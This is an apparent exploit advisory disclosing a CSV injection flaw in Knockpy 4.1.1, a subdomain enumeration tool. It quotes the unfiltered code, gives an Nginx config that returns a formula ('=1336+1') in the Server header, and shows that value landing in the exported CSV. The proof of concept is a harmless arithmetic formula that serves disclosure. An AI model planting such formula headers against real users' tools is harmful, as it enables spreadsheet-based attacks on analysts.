# Exploit Title: Knockpy 4.1.1 - CSV Injection # Author: Dolev Farhi # Date: 2020-12-29 # Vendor Homepage: https://github.com/guelfoweb/knock # Version : 4.1.1 # Tested on: Debian 9.13 Knockpy, as part of its subdomain brute forcing flow of a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc. The data then gets reflected when issuing the -c flag to store as a CSV file with the Server HTTP Response Header unfiltered. Vulnerable code segment(s) # knockpy.py # row = ip+'\t'+str(data['status'])+'\t'+'host'+'\t'+str(data['hostname'])+get_tab(data['hostname'])+str(server_type) # subdomain_csv_list.append(ip+','+str(data['status'])+','+'host'+','+str(data['hostname'])+','+str(server_type)) # modules/save_report.py # if fields: # csv_report += 'ip,status,type,domain_name,server\n' # for item in report: # csv_report += item + '\n' # report = csv_report 1. Example malicious Nginx config to return CSV formula headers: http { ... server_tokens off; more_set_headers 'Server: =1336+1'; ... } 2. Tester runs Knoockpy root@host:~/# python knockpy/knockpy.py -c test.local + checking for virustotal subdomains: SKIP VirusTotal API_KEY not found + checking for wildcard: NO + checking for zonetransfer: NO + resolving target: YES - scanning for subdomain... Ip Address Status Type Domain Name Server ---------- ------ ---- ----------- ------ 200 host appserver.test.local =1336+1 CSV result root@host:~/# cat test_local.csv,200,host,appserver.test.local,=1336+1,200,host,www.test.local,=1336+1